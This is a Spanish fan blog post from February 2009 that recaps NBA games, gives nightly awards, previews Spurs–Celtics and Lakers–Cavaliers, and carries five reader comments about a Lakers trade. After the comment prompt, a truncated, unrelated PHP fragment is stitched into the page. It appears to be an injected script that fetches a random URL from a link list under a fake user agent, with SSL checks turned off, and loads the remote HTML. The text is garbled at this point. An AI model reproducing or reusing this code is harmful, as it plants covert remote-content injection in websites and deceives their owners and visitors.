La crónica (07/02/2009)

08 de February de 2009 por Jabho

Dice el sabio refranero español que siempre hay un roto para un descosío. Debe ser cierto. Les presento al roto, los Raptors, y al descosío, los Grizzilies. “Partidazo” con claro sabor ACB… 70-78… ah, y que jugaban Jose y Marc. En el fondo los Grizzilies están haciendo una temporada acorde a sus posibilidades, ahora mismo hay 4 equipos peores que no está mal, pero lor Raptors caminan sin rumbo, mejor se desploman sin rumbo. En Memphis, que jugaron sin Gay por lesión, destacan los 12 puntos en el último cuarto de OJ Mayo para llevarse el partido. Los Raptors jugaron sin Bosh que suena que se quiere ir y quién sabe si acabará la temporada en Canadá. No es cuestión de cebarse, pero en ausencia de Bosh salen más caros, si cabe, los 6 puntitos de Jermaine… De momento penúltimos del Este y sumando.

Otros que jugaron partido ACB fueron los Nuggets y sus 70 puntos. Pa´matarlos. Si antes hablamos bien de ellos…Delante estuvieron los Nets que recuperaron sensaciones de inicio de temporada, y con Harris de nuevo fino encadenan 4 victorias consecutivas y vuelven a puestos de Play Offs. Será coincidencia pero siempre pillo buenos partidos de Ryan Anderson que me parece que hará una muy digna carrara NBA. Lopez estuvo mejor que Nenê y  Billups desaparecido. Melo fue el mejor de Denver si pero sin alardes.

¿Alguien se acuerda de los Hawks del principio de temporada? Ayer perdieron ante los Clippers que con los buenos de nuevo en cancha, falta Kaman por reaparecer, es capaz de dar un susto a cualquiera. Los Hawks siguen 4º del Este pero deben recuperar el tono que de atrás vienen apretando los Sixers, entre otros.

Los de Philadelphia ganaron con comodidad a los Heat y los tienen a tiro de piedra. Los Sixers han perdido a Brand por lo que queda de temporada y no se sabe si respiraran aliviados… El caso es que del 4º al 7º del Este puede haber baile de posiciones a poco que algún equipo se proponga hacerlo mejor que el resto, y los Sixers parecen ser los que más se lo han propuesto.

También muy en forma paracen los Mavericks que ayer ganaron los Bulls con prorroga incluida. Eso si, se lesionó Terry y a ver para cuanto tiene. No nos enamora el juego de Terry, pero es el 2º máximo anotador del equipo y claro aspirante a mejor 6º hombre de la liga. Rose se jugó un tiro que hubiera evitado la prórroga pero no pudo ser.

Cerramos la jornada con la victoria, cómoda, de los Rockets ante los Wolves y la menos cómoda, pero victoria también, de los Pistons contrá los Bucks en un partido que parece acordaron jugar sin defender mucho.

PREMIOS

MVP: Desde luego candidatos hay de sobra, pero la actuación de Dirk Nowitzki, 44 puntos y 9 rebotes, es la mejor de entre los que además ganaron el partido. Dirk tira de Dallas y el equipo, sin perder de vista a Jazz y Suns, empieza a mirar muy de cerca a Rockets, Blazers, Hornets….También hay tapón en el Oeste.

Rookie: Sin grandes partidazos, si varios novatos destacaron anoche. Mayo no estuvo bien pero apareció para ganar el partido, Speights tuvo una aportación destacada en la victoria Sixer, Rose y Chalmers no ganaron pero hicieron buenos partidos… Me quedo con el duo Anderson&Lopez que jugaban contra Nenê y bruto Martin, lo que viene siendo una pareja muy solvente este año, y les ganaron la partida claramente.

Sorpresa: Buenos partidos de Tyrus Thomas, viene jugando bien últimamente, o de Thorton. Pero ambos eclipsados por los 44 puntos y 12 asistencias de Ramon Sessions. Sin Ridnour, sin Redd, sin Bogut… aun así partidazo el suyo.

Decepción: Los Nuggets toditos ellos. Tienen a los Spurs a tiro de piedra y “deciden” tomarse libre la noche de sábado que con la jornada que les espera a sus rivales hoy ya les vale…En fin, un despiste lo tiene cualquiera.

Mayor esfuerzo en Vano: No está mal el partido de Sessions&Villanueva para que Jefferson fallará el triple que les hubiera mandado a la prórroga. Me quedo sin embargo con los 36 puntos y 22 rebotes de Al Jefferson, ayer lo reclamaban para el All Star, contra la muralla china, Yao Ming.

RAZONES PARA TRASNOCHAR

Como si de una eliminatoria de copa Davis se tratara, la ABC ha programado en la doble cabecera de los domingos por la tarde el doble enfrentamiento entre los primeros de ambas conferencias en horario de tarde europeo. Todo lo que no sea ver a 2 de estos 4 equipos jugando las finales de la liga será una sopresa. LeBron, Kobe, Garnett y Duncan. Pero también Pierce, Manu, Gasol… ¿quién da más?:

Spurs@Celtics: A las 7 hora española se enfrentan los dos últimos campeones. Ambos vienen de noches de back-to-back acabadas con una victoria y una derrota. Los Spurs, 2º del Oeste,  siguen en su Rodeo Road Trip, aunque Popovich dejó a sus mejores jugadores sin jugar el jueves por lo que se presume que estarán descansados. Boston, 2º del Este, viene de perder contra los Lakers y ganar con dificultades la noche siguiente en el Madison. Esta temporada los Celtics han perdido los dos partidos contra los Lakers y el último jugado contra los Cavs. Siendo un partido como cualquier otro, no está de más ganar a los favoritos no sea que vaya haciendo daño moral perder contra los buenos… Garnett contra Duncan. Dos de los mejores ala pivots de la historia, dos estilos de juego y de comportarse en la cancha que nada tienen que ver. Bueno comparten, que no es poco, un espíritu ganador que hace que dejen de lado su ego anotador y centren sus esfuerzos en ambos lados de la cancha por igual, con un único objetivo: ganar.

Lakers@Cavaliers: Partidazo entre los líderes de ambas de conferencias y los dos últimos equipos que han perdido una final. Ahí es nada. A las 9:30 hora española o cuando acabe el anterior. Los Lakers vienen crecidos, con un Odom que dió un paso al fente ante los Celtics (a ver si dura), con un Gasol que está jugando su mejor baloncesto de siempre posiblemente y con un Kobe estratosférico como siempre que algo, la lesión de Bynum en este caso, amenaza con interponerse en su objetivo, el anillo. Los Cavs no conocen la derrota en casa. 23 partidos ganados en casa y ninguno perdido, que se dice pronto. Todos los que han pasado por Cleveland han mordido el polvo ante un equipo que es la mejor defensa de la liga, y apenas permite 89 puntos al rival en su casa. Con Mo Williams ninguneado, injustamente, para el All Star. Con el recuperado Big Z, con el Elegido

Los jugadores a seguir esta noche no podían ser otros que…. LeBron y Kobe. El último y el próximo MVP. A ambos les sobran razones para motivarse pero por si acaso ambos dejaron su sello en el Madison. Además  recientemente a uno le ha quitado un triple doble histórico y al otro un record de precocidad. Pero todo eso casi sobra. Están uno frente a otro y eso es suficiente. Por que ahi quién dice que uno es el mejor jugador del mundo y, cosas de la vida, otros dicen que el otro es el mejor del mundo. Y ninguno de los dos está dispuesto a que persista la duda.

Comenta

5 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Se dice por algunos sitios que los Nets están buscandole salida a Carter, habria que ver que reciben a cambio pero en principio me parece un movimiento equivocado. Se encontraron con Lopez en una posición baja y a Ryan Anderson en una aun mas baja(pese a sus números en la universidad), este verano liberan el contrarto de Swift que son 6 millones y en el famosos 2010 liberan 10 kilazos de Bobby Simmons.

    Habrá que comentar algo del trade que lleva a Adam Morrison a los Lakers. Mi comentario es este: bieeeeeeeeeeeeeeeeeeeeen.

      Citar

  2. Jabho dice:
    #2

    Pues nueva derrota de los Celtics ante un favorito. Da que pensar. El caso es que a falta de 20 segundos teníamos nuestras opciones, pero a Ray Allen se le ha ido el balón en el saque de banda y antideportiva a Pierce y partido acabado… Lo dicho, no es importante pero da que pensar.

    Sobre el trade Laker no sé en que estña pensando Jordan. Radma no creo que aporte mucho más que Morrison y además tiene un año más de contrato… Todo suponiendo que no suba sus prestaciones el bueno de Morrison…. En fin, que Jordan&Brown están haciendo un equipo cuanto menos curioso.

    A ver si los Cavs le dan pal pelo a los lakers 🙂

      Citar

  3. TheDeerHunter dice:
    #3

    Me temo que no va a ser, Jabho…. Se acabó la imbatibilidad en casa XD

    Me cansé en verano de gritar a los mil vientos que hacía falta un base más para completar la plantilla. Mira por donde, de repente todas mis oraciones son escuchadas y de una tacada se larga Radmanovic y llega Morrison y otro base.
    Es que en el peor de los casos el contrato termina antes!!!! Operación redonda y noche redonda.

    Si por una de esas, pudieramos recuperar a Bynum os digo que este es el equipo de mis sueños. Otra cosa es que eso nos sirva para ganar… Sin Bynum también podemos.

      Citar

  4. Jabho dice:
    #4

    Pues si, semana de los sueños para los Lakers que menuda semanita se han marcado….

    Jojo, vaya nivel de Odom. Con lo que hemos rajado de él. A ver si le dura.

    El trade es bueno más porque suelta muy poco que por lo que recibe. Brown poco y Morrison cuando ha jugado a estado perdidísimo. Otra cosa es que con paciencia y tiempo saques de él una versión mejorada de Vujacic. Se verá.

    Lo que está claro es que con o sin Bynum cuando lleguen los momentos importantes asumiréis la presión de ganar ¿no? No como el año pasado que si el favorito eran los C´s y milongas similares…. xD

      Citar

  5. TheDeerHunter dice:
    #5

    Bueno,
    con Bynum sí… yo creo que favoritos.
    Sin él, si yo dijera que somos favoritos rozaría la prepotencia. Faltar él es faltar mucho.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>